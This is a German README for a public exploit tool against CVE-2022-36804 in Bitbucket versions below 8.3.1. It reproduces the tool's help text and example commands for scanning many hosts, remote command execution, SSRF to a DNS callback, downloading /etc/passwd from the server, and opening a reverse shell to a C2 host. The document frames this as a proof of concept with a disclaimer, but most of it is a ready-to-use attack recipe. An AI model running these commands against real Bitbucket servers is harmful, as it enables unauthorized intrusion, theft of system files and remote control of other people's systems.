
Multithreaded Exploit-Skript für CVE-2022-36804, das BitBucket-Versionen <8.3.1 betrifft.
Multithreaded Exploit-Skript für CVE-2022-36804, das (die meisten) BitBucket-Versionen <8.3.1 betrifft. Das vollständige Advisory finden Sie hier https://jira.atlassian.com/browse/BSERV-13438
Alle Anerkennung für die Entdeckung gebührt TheGrandPew
Das Skript erkennt automatisch öffentliche Repositorys auf Bitbucket-Instanzen und wählt dann ein zufälliges Repository aus, um die Schwachstelle zu prüfen oder auszuführen. Wenn keine öffentlichen Repositorys vorhanden sind, wird ein gültiges 'BITBUCKETSESSIONID'-Cookie benötigt, um bekannte verwundbare Instanzen auszunutzen.
Der PoC wurde entwickelt, um mehrere Eingabe-Hosts entgegenzunehmen und verwundbare Hosts an stdout auszugeben, sodass die Ergebnisse zur Verarbeitung durch andere Tools weitergeleitet werden können.
Nicht für böswillige Zwecke verwenden.
usage: CVE-2022-36804.py [-h] [--auth-cookie AUTH_COOKIE] [--proxy PROXY] [-e {check,rce,ssrf,download,rev_shell}] [--cmd CMD] [--knary KNARY] [--server-file SERVER_FILE] [--host HOST] [--port PORT]
[--skip-check] [-t THREADS] [-v]
repos [repos ...]
CVE-2022-36804 Exploit Script for BitBucket versions < 8.3.1
optional arguments:
-h, --help show this help message and exit
required arguments:
repos Repository host/s (http://bitbucket.example.com:7990) (or single input file "./targets.txt" of target hosts) to perfrom CVE-2022-36804 on
optional arguments:
--auth-cookie AUTH_COOKIE
Authentication cookie 'BITBUCKETSESSIONID' value for private repositories
--proxy PROXY HTTP Proxy: <http/https>://<ip>:<port>
-e {check,rce,ssrf,download,rev_shell}, --exploit {check,rce,ssrf,download,rev_shell}
Exploit to perform
--cmd CMD Command to execute for the 'rce' exploit (curl http://example.com)
--knary KNARY Knary to respond too via DNS for the 'ssrf' exploit
--server-file SERVER_FILE
Server file to download for the 'download' exploit (/etc/passwd)
--host HOST Hostname or IP address of c2 for the 'rev_shell' exploit
--port PORT Port of the c2 for the 'rev_shell' exploit
--skip-check Skip vulnerability checking stage
-t THREADS, --threads THREADS
Worker Threads
-v, --verbose Increase output verbosity level
Einzelner Host
CVE-2022-36804.py http://bitbucket.local:7990/Mehrere Hosts und Weiterleitung verwundbarer Hosts und ausgenutzter Repositorys in eine Datei
CVE-2022-36804.py ./bitbucket-hosts.txt > vulnerable-hosts
CVE-2022-36804.py -e rce --cmd "curl http://example.com/" http://bitbucket.local:7990/
Führen Sie eine DNS-Anfrage an den angegebenen Knary aus.
CVE-2022-36804.py -e ssrf --knary http://knary.example.com http://bitbucket.local:7990/
Lädt ein Repository mit der Zieldatei
/etc/passwdherunter. Das komprimierte Repository wird unter einem zufälligen Dateinamen gespeichert.
CVE-2022-36804.py -e download --server-file /etc/passwd http://bitbucket.local:7990/
CVE-2022-36804.py -e rev_shell --host 127.0.0.1 --port 31337 http://bitbucket.local:7990/